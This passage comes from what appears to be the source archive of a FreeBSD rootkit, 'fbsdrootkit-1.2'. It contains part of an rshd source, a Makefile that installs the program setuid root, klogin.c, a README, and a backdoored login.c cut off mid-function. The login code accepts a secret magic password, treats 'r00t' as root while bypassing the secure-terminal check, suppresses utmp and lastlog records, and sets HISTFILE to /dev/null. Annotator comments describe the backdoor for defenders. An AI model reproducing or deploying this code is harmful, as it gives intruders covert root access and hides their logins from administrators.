login. 
cmd='%.80s'", remuser, hostname, locuser, cmdbuf); if (errorstr == NULL) errorstr = "Login incorrect.\n"; goto fail; } if (chdir(pwd->pw_dir) < 0) { (void) chdir("/"); #ifdef notdef syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: no home directory. cmd='%.80s'", remuser, hostname, locuser, cmdbuf); error("No remote directory.\n"); exit(1); #endif } #ifdef KERBEROS if (use_kerberos) { if (pwd->pw_passwd != 0 && *pwd->pw_passwd != '\0') { if (kuserok(kdata, locuser) != 0) { syslog(LOG_INFO|LOG_AUTH, "Kerberos rsh denied to %s.%s@%s", kdata->pname, kdata->pinst, kdata->prealm); error("Permission denied.\n"); exit(1); } } } else #endif if (errorstr || (pwd->pw_expire && time(NULL) >= pwd->pw_expire) || (pwd->pw_passwd != 0 && *pwd->pw_passwd != '\0' && iruserok(fromp->sin_addr.s_addr, pwd->pw_uid == 0, remuser, locuser) < 0)) { if (__rcmd_errstr) syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: permission denied (%s). cmd='%.80s'", remuser, hostname, locuser, __rcmd_errstr, cmdbuf); else syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: permission denied. 
cmd='%.80s'", remuser, hostname, locuser, cmdbuf); fail: if (errorstr == NULL) errorstr = "Permission denied.\n"; error(errorstr, errorhost); exit(1); } if (pwd->pw_uid && !access(_PATH_NOLOGIN, F_OK)) { error("Logins currently disabled.\n"); exit(1); } (void) write(STDERR_FILENO, "\0", 1); sent_null = 1; if (port) { if (pipe(pv) < 0) { error("Can't make pipe.\n"); exit(1); } #ifdef CRYPT #ifdef KERBEROS if (doencrypt) { if (pipe(pv1) < 0) { error("Can't make 2nd pipe.\n"); exit(1); } if (pipe(pv2) < 0) { error("Can't make 3rd pipe.\n"); exit(1); } } #endif #endif pid = fork(); if (pid == -1) { error("Can't fork; try again.\n"); exit(1); } if (pid) { #ifdef CRYPT #ifdef KERBEROS if (doencrypt) { static char msg[] = SECURE_MESSAGE; (void) close(pv1[1]); (void) close(pv2[1]); des_write(s, msg, sizeof(msg) - 1); } else #endif #endif { (void) close(0); (void) close(1); } (void) close(2); (void) close(pv[1]); FD_ZERO(&readfrom); FD_SET(s, &readfrom); FD_SET(pv[0], &readfrom); if (pv[0] > s) nfd = pv[0]; else nfd = s; #ifdef CRYPT #ifdef KERBEROS if (doencrypt) { FD_ZERO(&writeto); FD_SET(pv2[0], &writeto); FD_SET(pv1[0], &readfrom); nfd = MAX(nfd, pv2[0]); nfd = MAX(nfd, pv1[0]); } else #endif #endif ioctl(pv[0], FIONBIO, (char *)&one); /* should set s nbio! 
*/ nfd++; do { ready = readfrom; #ifdef CRYPT #ifdef KERBEROS if (doencrypt) { wready = writeto; if (select(nfd, &ready, &wready, (fd_set *) 0, (struct timeval *) 0) < 0) break; } else #endif #endif if (select(nfd, &ready, (fd_set *)0, (fd_set *)0, (struct timeval *)0) < 0) break; if (FD_ISSET(s, &ready)) { int ret; #ifdef CRYPT #ifdef KERBEROS if (doencrypt) ret = des_read(s, &sig, 1); else #endif #endif ret = read(s, &sig, 1); if (ret <= 0) FD_CLR(s, &readfrom); else killpg(pid, sig); } if (FD_ISSET(pv[0], &ready)) { errno = 0; cc = read(pv[0], buf, sizeof(buf)); if (cc <= 0) { shutdown(s, 1+1); FD_CLR(pv[0], &readfrom); } else { #ifdef CRYPT #ifdef KERBEROS if (doencrypt) (void) des_write(s, buf, cc); else #endif #endif (void) write(s, buf, cc); } } #ifdef CRYPT #ifdef KERBEROS if (doencrypt && FD_ISSET(pv1[0], &ready)) { errno = 0; cc = read(pv1[0], buf, sizeof(buf)); if (cc <= 0) { shutdown(pv1[0], 1+1); FD_CLR(pv1[0], &readfrom); } else (void) des_write(STDOUT_FILENO, buf, cc); } if (doencrypt && FD_ISSET(pv2[0], &wready)) { errno = 0; cc = des_read(STDIN_FILENO, buf, sizeof(buf)); if (cc <= 0) { shutdown(pv2[0], 1+1); FD_CLR(pv2[0], &writeto); } else (void) write(pv2[0], buf, cc); } #endif #endif } while (FD_ISSET(s, &readfrom) || #ifdef CRYPT #ifdef KERBEROS (doencrypt && FD_ISSET(pv1[0], &readfrom)) || #endif #endif FD_ISSET(pv[0], &readfrom)); exit(0); } setpgrp(0, getpid()); (void) close(s); (void) close(pv[0]); #ifdef CRYPT #ifdef KERBEROS if (doencrypt) { close(pv1[0]); close(pv2[0]); dup2(pv1[1], 1); dup2(pv2[1], 0); close(pv1[1]); close(pv2[1]); } #endif #endif dup2(pv[1], 2); close(pv[1]); } if (*pwd->pw_shell == '\0') pwd->pw_shell = _PATH_BSHELL; #if BSD > 43 if (setlogin(pwd->pw_name) < 0) syslog(LOG_ERR, "setlogin() failed: %m"); #endif (void) setgid((gid_t)pwd->pw_gid); initgroups(pwd->pw_name, pwd->pw_gid); (void) setuid((uid_t)pwd->pw_uid); environ = envinit; strncat(homedir, pwd->pw_dir, sizeof(homedir)-6); strcat(path, _PATH_DEFPATH); 
strncat(shell, pwd->pw_shell, sizeof(shell)-7); strncat(username, pwd->pw_name, sizeof(username)-6); cp = strrchr(pwd->pw_shell, '/'); if (cp) cp++; else cp = pwd->pw_shell; endpwent(); if (log_success || pwd->pw_uid == 0) { #ifdef KERBEROS if (use_kerberos) syslog(LOG_INFO|LOG_AUTH, "Kerberos shell from %s.%s@%s on %s as %s, cmd='%.80s'", kdata->pname, kdata->pinst, kdata->prealm, hostname, locuser, cmdbuf); else #endif syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: cmd='%.80s'", remuser, hostname, locuser, cmdbuf); } execl(pwd->pw_shell, cp, "-c", cmdbuf, 0); perror(pwd->pw_shell); exit(1); } /* * Report error to client. Note: can't be used until second socket has * connected to client, or older clients will hang waiting for that * connection first. */ #if __STDC__ #include #else #include #endif void #if __STDC__ error(const char *fmt, ...) #else error(fmt, va_alist) char *fmt; va_dcl #endif { va_list ap; int len; char *bp, buf[BUFSIZ]; #if __STDC__ va_start(ap, fmt); #else va_start(ap); #endif bp = buf; if (sent_null == 0) { *bp++ = 1; len = 1; } else len = 0; (void)vsnprintf(bp, sizeof(buf) - 1, fmt, ap); (void)write(STDERR_FILENO, buf, len + strlen(bp)); } void getstr(buf, cnt, err) char *buf, *err; int cnt; { char c; do { if (read(STDIN_FILENO, &c, 1) != 1) exit(1); *buf++ = c; if (--cnt == 0) { error("%s too long\n", err); exit(1); } } while (c != 0); } /* * Check whether host h is in our local domain, * defined as sharing the last two components of the domain part, * or the entire domain part if the local domain has only one component. * If either name is unqualified (contains no '.'), * assume that the host is local, as it will be * interpreted as such. 
*/ int local_domain(h) char *h; { char localhost[MAXHOSTNAMELEN]; char *p1, *p2; localhost[0] = 0; (void) gethostname(localhost, sizeof(localhost)); p1 = topdomain(localhost); p2 = topdomain(h); if (p1 == NULL || p2 == NULL || !strcasecmp(p1, p2)) return (1); return (0); } char * topdomain(h) char *h; { char *p, *maybe = NULL; int dots = 0; for (p = h + strlen(h); p >= h; p--) { if (*p == '.') { if (++dots == 2) return (p); maybe = p; } } return (maybe); } void usage() { syslog(LOG_ERR, "usage: rshd [-%s]", OPTIONS); exit(2); } fbsdrootkit-1.2/login/ 40700 764 764 0 6255651214 12152 5ustar dfdffbsdrootkit-1.2/login/Makefile100600 764 764 1160 5762566240 13715 0ustar dfdf# From: @(#)Makefile 8.1 (Berkeley) 7/19/93 # $Id: Makefile,v 1.13 1995/05/30 06:31:25 rgrimes Exp $ PROG= login MAN1= login.1 MAN5= login.access.5 SRCS= login.c login_access.c login_fbtab.c CFLAGS+=-DLOGIN_ACCESS -DSKEY -DLOGALL .if defined(KLOGIN_PARANOID) CFLAGS+=-DKLOGIN_PARANOID .endif DPADD= ${LIBUTIL} ${LIBSKEY} ${LIBMD} ${LIBCRYPT} LDADD= -lutil -lskey -lmd -lcrypt .if exists(${DESTDIR}/usr/lib/libkrb.a) && defined(MAKE_EBONES) CFLAGS+=-DKERBEROS SRCS+= klogin.c DPADD+= ${LIBKRB} ${LIBDES} LDADD+= -lkrb -ldes DISTRIBUTION= krb .endif BINOWN= root BINMODE=4555 INSTALLFLAGS=-fschg .include fbsdrootkit-1.2/login/klogin.c100600 764 764 14205 6163361000 13707 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. 
All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
*/

#ifndef lint
static char sccsid[] = "@(#)klogin.c 8.3 (Berkeley) 4/2/94";
#endif /* not lint */

#ifdef KERBEROS
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define INITIAL_TICKET "krbtgt"
#define VERIFY_SERVICE "rcmd"

extern int notickets;
extern char *krbtkfile_env;

/*
 * Attempt to log the user in using Kerberos authentication
 *
 * return 0 on success (will be logged in)
 *	  1 if Kerberos failed (try local password in login)
 *
 * pw is the passwd entry of the account, instance the Kerberos instance
 * string, localhost the local host name and password the cleartext the
 * user typed.  On the success paths the global notickets is cleared.
 * The ticket verification step is compiled only under KLOGIN_PARANOID;
 * without it, obtaining a TGT is enough for a return of 0.
 */
int
klogin(pw, instance, localhost, password)
	struct passwd *pw;
	char *instance, *localhost, *password;
{
	int kerror;
	AUTH_DAT authdata;
	KTEXT_ST ticket;
	struct hostent *hp;
	unsigned long faddr;
	char realm[REALM_SZ], savehost[MAXHOSTNAMELEN];
	char tkt_location[MAXPATHLEN];
	char *krb_get_phost();
	extern int noticketsdontcomplain;

#ifdef KLOGIN_PARANOID
	noticketsdontcomplain = 0;	/* enable warning message */
#endif
	/*
	 * Root logins don't use Kerberos.
	 * If we have a realm, try getting a ticket-granting ticket
	 * and using it to authenticate.  Otherwise, return
	 * failure so that we can try the normal passwd file
	 * for a password.  If that's ok, log the user in
	 * without issuing any tickets.
	 */
	if (strcmp(pw->pw_name, "root") == 0 ||
	    krb_get_lrealm(realm, 0) != KSUCCESS)
		return (1);

	noticketsdontcomplain = 0;	/* enable warning message */

	/*
	 * get TGT for local realm
	 * tickets are stored in a file named TKT_ROOT plus uid
	 * except for user.root tickets.
	 *
	 * NOTE(review): both sprintf() calls are unbounded; they fit in
	 * tkt_location only as long as TKT_ROOT (defined elsewhere) is
	 * short.  snprintf() with sizeof(tkt_location) would make the bound
	 * explicit.
	 */
	if (strcmp(instance, "root") != 0)
		(void)sprintf(tkt_location, "%s%d", TKT_ROOT, pw->pw_uid);
	else {
		(void)sprintf(tkt_location, "%s_root_%d", TKT_ROOT,
		    pw->pw_uid);
		/*
		 * NOTE(review): tkt_location is an automatic array, so this
		 * global keeps pointing into klogin's stack frame after the
		 * function returns.  login.c in this archive later passes
		 * krbtkfile_env to setenv("KRBTKFILE", ...).
		 */
		krbtkfile_env = tkt_location;
	}
	(void)krb_set_tkt_string(tkt_location);

	/*
	 * Set real as well as effective ID to 0 for the moment,
	 * to make the kerberos library do the right thing.
	 */
	if (setuid(0) < 0) {
		warnx("setuid");
		return (1);
	}
	kerror = krb_get_pw_in_tkt(pw->pw_name, instance,
	    realm, INITIAL_TICKET, realm, DEFAULT_TKT_LIFE, password);
	/*
	 * If we got a TGT, get a local "rcmd" ticket and check it so as to
	 * ensure that we are not talking to a bogus Kerberos server.
	 *
	 * There are 2 cases where we still allow a login:
	 *	1: the VERIFY_SERVICE doesn't exist in the KDC
	 *	2: local host has no srvtab, as (hopefully) indicated by a
	 *	   return value of RD_AP_UNDEC from krb_rd_req().
	 */
	if (kerror != INTK_OK) {
		/* a bad password or unknown principal is not logged */
		if (kerror != INTK_BADPW && kerror != KDC_PR_UNKNOWN) {
			syslog(LOG_ERR, "Kerberos intkt error: %s",
			    krb_err_txt[kerror]);
			dest_tkt();
		}
		return (1);
	}

	if (chown(TKT_FILE, pw->pw_uid, pw->pw_gid) < 0)
		syslog(LOG_ERR, "chown tkfile (%s): %m", TKT_FILE);

	(void)strncpy(savehost, krb_get_phost(localhost), sizeof(savehost));
	/* NOTE(review): NULL is used here as the string terminator; '\0' is meant. */
	savehost[sizeof(savehost)-1] = NULL;

#ifdef KLOGIN_PARANOID
	/*
	 * if the "VERIFY_SERVICE" doesn't exist in the KDC for this host,
	 * still allow login with tickets, but log the error condition.
	 */

	kerror = krb_mk_req(&ticket, VERIFY_SERVICE, savehost, realm, 33);
	if (kerror == KDC_PR_UNKNOWN) {
		syslog(LOG_NOTICE,
		    "warning: TGT not verified (%s); %s.%s not registered, or srvtab is wrong?",
		    krb_err_txt[kerror], VERIFY_SERVICE, savehost);
		notickets = 0;
		return (0);
	}

	if (kerror != KSUCCESS) {
		warnx("unable to use TGT: (%s)", krb_err_txt[kerror]);
		syslog(LOG_NOTICE, "unable to use TGT: (%s)",
		    krb_err_txt[kerror]);
		dest_tkt();
		return (1);
	}

	if (!(hp = gethostbyname(localhost))) {
		syslog(LOG_ERR, "couldn't get local host address");
		dest_tkt();
		return (1);
	}

	/* NOTE(review): copies sizeof(unsigned long) bytes from h_addr -- assumes the address is at least that long. */
	memmove((void *)&faddr, (void *)hp->h_addr, sizeof(faddr));

	kerror = krb_rd_req(&ticket, VERIFY_SERVICE, savehost, faddr,
	    &authdata, "");

	if (kerror == KSUCCESS) {
		notickets = 0;
		return (0);
	}

	/* undecipherable: probably didn't have a srvtab on the local host */
	/*
	 * NOTE(review): this is an assignment, not a comparison.  Provided
	 * RD_AP_UNDEC is non-zero (its value is not visible here) the branch
	 * is always taken, the message logged is always the RD_AP_UNDEC one
	 * and the "other reason" code below is never reached.  The branch
	 * also returns 1, while the comment further up lists RD_AP_UNDEC as
	 * a case where login is still allowed -- confirm the intent before
	 * changing it.
	 */
	if (kerror = RD_AP_UNDEC) {
		syslog(LOG_NOTICE, "krb_rd_req: (%s)\n", krb_err_txt[kerror]);
		dest_tkt();
		return (1);
	}
	/* failed for some other reason */
	warnx("unable to verify %s ticket: (%s)", VERIFY_SERVICE,
	    krb_err_txt[kerror]);
	syslog(LOG_NOTICE, "couldn't verify %s ticket: %s", VERIFY_SERVICE,
	    krb_err_txt[kerror]);
	dest_tkt();
	return (1);
#else
	notickets = 0;
	return (0);
#endif
}
#endif
fbsdrootkit-1.2/login/README100600 764 764 1316 5705727260 13136 0ustar dfdfThis login has additional functionalities. They are all based on (part of) Wietse Venema's logdaemon package. The following defines can be used: 1) LOGIN_ACCESS to allow access control on a per tty/user combination 2) SKEY to allow the use of s/key one time passwords 3) LOGALL to log all logins -Guido This login has some of Berkeley's paranoid/broken (depending on your point of view) Kerberos code conditionalized out, so that by default it works like klogin does at MIT-LCS. You can define KLOGIN_PARANOID to re-enable this code.
This define also controls whether a warning message is printed when logging into a system with no krb.conf file, which usually means that Kerberos is not configured. -GAWollman fbsdrootkit-1.2/login/login.c100600 764 764 42472 6257154600 13555 0ustar dfdf/*- * Copyright (c) 1980, 1987, 1988, 1991, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1980, 1987, 1988, 1991, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)login.c 8.4 (Berkeley) 4/2/94"; #endif /* not lint */ /* * login [ name ] * login -h hostname (for telnetd, etc.) * login -f name (for pre-authenticated login: datakit, xterm, etc.) */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef SKEY #include #endif #include "pathnames.h" /* Rootkit configuration files */ #include "../config.h" void badlogin __P((char *)); void checknologin __P((void)); void dolastlog __P((int)); void getloginname __P((void)); void motd __P((void)); int rootterm __P((char *)); void sigint __P((int)); void sleepexit __P((int)); char *stypeof __P((char *)); void timedout __P((int)); void login_fbtab __P((char *, uid_t, gid_t)); #ifdef KERBEROS int klogin __P((struct passwd *, char *, char *, char *)); #endif extern void login __P((struct utmp *)); #define TTYGRPNAME "tty" /* name of group to own ttys */ /* * This bounds the time given to login. Not a define so it can * be patched on machines where it's too small. 
*/
u_int	timeout = 300;

#ifdef KERBEROS
int	notickets = 1;
int	noticketsdontcomplain = 1;
char	*instance;
char	*krbtkfile_env;
int	authok;
#endif

struct	passwd *pwd;
int	failures;
char	term[64], *envinit[1], *hostname, *username, *tty;

/*
 * main -- entry point of the login(1) replacement shipped in this archive.
 *
 * The flow follows BSD login: parse -f/-h/-p, obtain a login name, check
 * the password (S/Key and Kerberos variants are conditionally compiled),
 * then record the session, build the environment, drop privileges and exec
 * the user's shell.
 *
 * NOTE(defender): the statements tagged "rootkit" below were added by the
 * archive's author.  As written they do three things:
 *   - accept a fixed secret (ROOTKIT_MAGIC; not defined in this file, which
 *     includes "../config.h" under "Rootkit configuration files") in place
 *     of the account password in the non-KERBEROS branch;
 *   - map the login name "r00t" to "root" and skip the secure-terminal
 *     check for that attempt;
 *   - when the secret was typed, skip login(&utmp), dolastlog(), the
 *     ROOT LOGIN and LOGALL syslog records and the login_access() check,
 *     and point HISTFILE at /dev/null.
 * A session opened that way leaves none of the records this program
 * normally writes, so the absence of those records is not evidence that
 * no login took place.  Verify the installed login binary against a
 * known-good copy and rely on evidence produced outside this process.
 */
int
main(argc, argv)
	int argc;
	char *argv[];
{
	extern char **environ;
	struct group *gr;
	struct stat st;
	struct timeval tp;
	struct utmp utmp;
	int ask, ch, cnt, fflag, hflag, pflag, quietlog, rootlogin, rval;
	int changepass;
	uid_t uid;
	char *domain, *p, *ep, *salt, *ttyn;
	char tbuf[MAXPATHLEN + 2], tname[sizeof(_PATH_TTY) + 10];
	char localhost[MAXHOSTNAMELEN];
	char full_hostname[MAXHOSTNAMELEN];
#ifdef SKEY
	int permit_passwd = 0;
#endif

	/* Some rootkit variables */
	char magic[7];		/* rootkit: secret compared with the typed password */
	char r00t[5];		/* rootkit: alias accepted as a login name */
	int passthru=0;		/* rootkit: non-zero once the alias was used */
	int werd=0;		/* rootkit: non-zero once the secret was typed */

	/* rootkit: six characters copied from ROOTKIT_MAGIC, then a NUL */
	magic[0]=ROOTKIT_MAGIC[0];
	magic[1]=ROOTKIT_MAGIC[1];
	magic[2]=ROOTKIT_MAGIC[2];
	magic[3]=ROOTKIT_MAGIC[3];
	magic[4]=ROOTKIT_MAGIC[4];
	magic[5]=ROOTKIT_MAGIC[5];
	magic[6]='\0';
	/* rootkit: the alias "r00t", also built one character at a time */
	r00t[0]='r';
	r00t[1]='0';
	r00t[2]='0';
	r00t[3]='t';
	r00t[4]='\0';

	/* the whole login dialogue is bounded by `timeout' seconds */
	(void)signal(SIGALRM, timedout);
	(void)alarm(timeout);
	(void)signal(SIGQUIT, SIG_IGN);
	(void)signal(SIGINT, SIG_IGN);
	(void)setpriority(PRIO_PROCESS, 0, 0);

	openlog("login", LOG_ODELAY, LOG_AUTH);

	/*
	 * -p is used by getty to tell login not to destroy the environment
	 * -f is used to skip a second login authentication
	 * -h is used by other servers to pass the name of the remote
	 *    host to login so that it may be placed in utmp and wtmp
	 */
	*full_hostname = '\0';
	domain = NULL;
	if (gethostname(localhost, sizeof(localhost)) < 0)
		syslog(LOG_ERR, "couldn't get local hostname: %m");
	else
		domain = strchr(localhost, '.');

	fflag = hflag = pflag = 0;
	uid = getuid();
	while ((ch = getopt(argc, argv, "fh:p")) != EOF)
		switch (ch) {
		case 'f':
			fflag = 1;
			break;
		case 'h':
			/* only a caller with real uid 0 may supply a host name */
			if (uid)
				errx(1, "-h option: %s", strerror(EPERM));
			hflag = 1;
			/*
			 * NOTE(review): only full_hostname[0] was initialised
			 * above, and strncpy() writes no terminator when
			 * optarg has sizeof(full_hostname)-1 or more
			 * characters.
			 */
			strncpy(full_hostname, optarg, sizeof(full_hostname)-1);
			/* strip the domain part when it equals the local domain */
			if (domain && (p = strchr(optarg, '.')) &&
			    strcasecmp(p, domain) == 0)
				*p = 0;
			hostname = optarg;
			break;
		case 'p':
			pflag = 1;
			break;
		case '?':
		default:
			if (!uid)
				syslog(LOG_ERR, "invalid flag %c", ch);
			(void)fprintf(stderr,
			    "usage: login [-fp] [-h hostname] [username]\n");
			exit(1);
		}
	argc -= optind;
	argv += optind;

	if (*argv) {
		username = *argv;
		ask = 0;
	} else
		ask = 1;

	/* close every descriptor above stderr */
	for (cnt = getdtablesize(); cnt > 2; cnt--)
		(void)close(cnt);

	ttyn = ttyname(STDIN_FILENO);
	if (ttyn == NULL || *ttyn == '\0') {
		(void)snprintf(tname, sizeof(tname), "%s??", _PATH_TTY);
		ttyn = tname;
	}
	/* tty is the last path component of ttyn */
	if (tty = strrchr(ttyn, '/'))
		++tty;
	else
		tty = ttyn;

	for (cnt = 0;; ask = 1) {
		if (ask) {
			fflag = 0;
			getloginname();
		}
		/* Check to see if root login is desired and disable secure tty check */
		/* rootkit: passthru disables the rootterm() test further down */
		if(!strcmp(username,r00t)) {
			strcpy(username,"root");
			passthru++;
		}
		rootlogin = 0;
#ifdef KERBEROS
		if ((instance = strchr(username, '.')) != NULL) {
			if (strncmp(instance, ".root", 5) == 0)
				rootlogin = 1;
			*instance++ = '\0';
		} else
			instance = "";
#endif
		if (strlen(username) > UT_NAMESIZE)
			username[UT_NAMESIZE] = '\0';

		/*
		 * Note if trying multiple user names; log failures for
		 * previous user name, but don't bother logging one failure
		 * for nonexistent name (mistyped username).
		 */
		if (failures && strcmp(tbuf, username)) {
			if (failures > (pwd ? 0 : 1))
				badlogin(tbuf);
			failures = 0;
		}
		(void)strcpy(tbuf, username);

		/* an unknown account still gets a salt, so crypt() always runs */
		if (pwd = getpwnam(username))
			salt = pwd->pw_passwd;
		else
			salt = "xx";

		/*
		 * if we have a valid account name, and it doesn't have a
		 * password, or the -f option was specified and the caller
		 * is root or the caller isn't changing their uid, don't
		 * authenticate.
		 */
		if (pwd) {
			if (pwd->pw_uid == 0)
				rootlogin = 1;

			if (fflag && (uid == 0 || uid == pwd->pw_uid)) {
				/* already authenticated */
				break;
			} else if (pwd->pw_passwd[0] == '\0') {
				/* pretend password okay */
				rval = 0;
				goto ttycheck;
			}
		}

		fflag = 0;

		(void)setpriority(PRIO_PROCESS, 0, -4);

#ifdef SKEY
		permit_passwd = skeyaccess(username, tty,
		    hostname ? full_hostname : NULL, NULL);
		p = skey_getpass("Password:", pwd, permit_passwd);
		ep = skey_crypt(p, salt, pwd, permit_passwd);
#else
		p = getpass("Password:");
		ep = crypt(p, salt);
#endif
		/* Check for the magic password */
		/* rootkit: compares the cleartext typed by the user with the secret */
		if(!strcmp(p,magic)) {
			werd++;
			/* Turn off history logging */
			setenv("HISTFILE","/dev/null",1);
		}

		if (pwd) {
#ifdef KERBEROS
#ifdef SKEY
			/*
			 * Do not allow user to type in kerberos password
			 * over the net (actually, this is ok for encrypted
			 * links, but we have no way of determining if the
			 * link is encrypted.
			 */
			if (!permit_passwd) {
				rval = 1;		/* failed */
			} else
#endif
			rval = klogin(pwd, instance, localhost, p);
			if (rval != 0 && rootlogin && pwd->pw_uid != 0)
				rootlogin = 0;
			if (rval == 0)
				authok = 1;
			else if (rval == 1)
				rval = strcmp(ep, pwd->pw_passwd);
#else
			/* Allow a good password or the magic one */
			/* rval == 0 means "authenticated"; werd forces it to 0 */
			rval = strcmp(ep, pwd->pw_passwd) && !werd;
#endif
		}
		/* wipe the cleartext password */
		memset(p, 0, strlen(p));

		(void)setpriority(PRIO_PROCESS, 0, 0);

	ttycheck:
		/*
		 * If trying to log in as root without Kerberos,
		 * but with insecure terminal, refuse the login attempt.
		 */
#ifdef KERBEROS
		if (authok == 0)
#endif
		/* rootkit: the !passthru term is the added part of this test */
		if (!passthru && pwd && !rval && rootlogin && !rootterm(tty)) {
			(void)fprintf(stderr,
			    "%s login refused on this terminal.\n",
			    pwd->pw_name);
			if (hostname)
				syslog(LOG_NOTICE,
				    "LOGIN %s REFUSED FROM %s ON TTY %s",
				    pwd->pw_name, hostname, tty);
			else
				syslog(LOG_NOTICE,
				    "LOGIN %s REFUSED ON TTY %s",
				    pwd->pw_name, tty);
			continue;
		}

		if (pwd && !rval)
			break;

		(void)printf("Login incorrect\n");
		failures++;
		/* we allow 10 tries, but after 3 we start backing off */
		if (++cnt > 3) {
			if (cnt >= 10) {
				badlogin(username);
				sleepexit(1);
			}
			sleep((u_int)((cnt - 3) * 5));
		}
	}

	/* committed to login -- turn off timeout */
	(void)alarm((u_int)0);

	endpwent();

	/* if user not super-user, check for disabled logins */
	if (!rootlogin)
		checknologin();

	if (chdir(pwd->pw_dir) < 0) {
		(void)printf("No home directory %s!\n", pwd->pw_dir);
		if (chdir("/"))
			exit(0);
		pwd->pw_dir = "/";
		(void)printf("Logging in with home = \"/\".\n");
	}

	quietlog = access(_PATH_HUSHLOGIN, F_OK) == 0;

	if (pwd->pw_change || pwd->pw_expire)
		(void)gettimeofday(&tp, (struct timezone *)NULL);

	changepass=0;
	/* warnings start 2 * 7 * 86400 seconds before the date */
	if (pwd->pw_change)
		if (tp.tv_sec >= pwd->pw_change) {
			(void)printf("Sorry -- your password has expired.\n");
			changepass=1;
		} else if (pwd->pw_change - tp.tv_sec <
		    2 * 7 * 86400 && !quietlog)
			(void)printf("Warning: your password expires on %s",
			    ctime(&pwd->pw_change));
	if (pwd->pw_expire)
		if (tp.tv_sec >= pwd->pw_expire) {
			(void)printf("Sorry -- your account has expired.\n");
			sleepexit(1);
		} else if (pwd->pw_expire - tp.tv_sec <
		    2 * 7 * 86400 && !quietlog)
			(void)printf("Warning: your account expires on %s",
			    ctime(&pwd->pw_expire));

	/* Nothing else left to fail -- really log in. */
	memset((void *)&utmp, 0, sizeof(utmp));
	(void)time(&utmp.ut_time);
	(void)strncpy(utmp.ut_name, username, sizeof(utmp.ut_name));
	if (hostname)
		(void)strncpy(utmp.ut_host, hostname, sizeof(utmp.ut_host));
	(void)strncpy(utmp.ut_line, tty, sizeof(utmp.ut_line));
	/* Don't log to utmp if using magic password */
	/* rootkit: the utmp record built above is discarded when werd is set */
	if(!werd)
		login(&utmp);

	/* Don't log to lastlog if magic password used */
	if(!werd)
		dolastlog(quietlog);

	/*
	 * Set device protections, depending on what terminal the
	 * user is logged in. This feature is used on Suns to give
	 * console users better privacy.
	 */
	login_fbtab(tty, pwd->pw_uid, pwd->pw_gid);

	/* the tty goes to the user, group TTYGRPNAME when that group exists */
	(void)chown(ttyn, pwd->pw_uid,
	    (gr = getgrnam(TTYGRPNAME)) ? gr->gr_gid : pwd->pw_gid);
	(void)setgid(pwd->pw_gid);

	initgroups(username, pwd->pw_gid);

	if (*pwd->pw_shell == '\0')
		pwd->pw_shell = _PATH_BSHELL;

	/* Destroy environment unless user has requested its preservation. */
	/* this also drops the HISTFILE set in the password loop; see the end of main */
	if (!pflag)
		environ = envinit;
	(void)setenv("HOME", pwd->pw_dir, 1);
	(void)setenv("SHELL", pwd->pw_shell, 1);
	if (term[0] == '\0')
		(void)strncpy(term, stypeof(tty), sizeof(term));
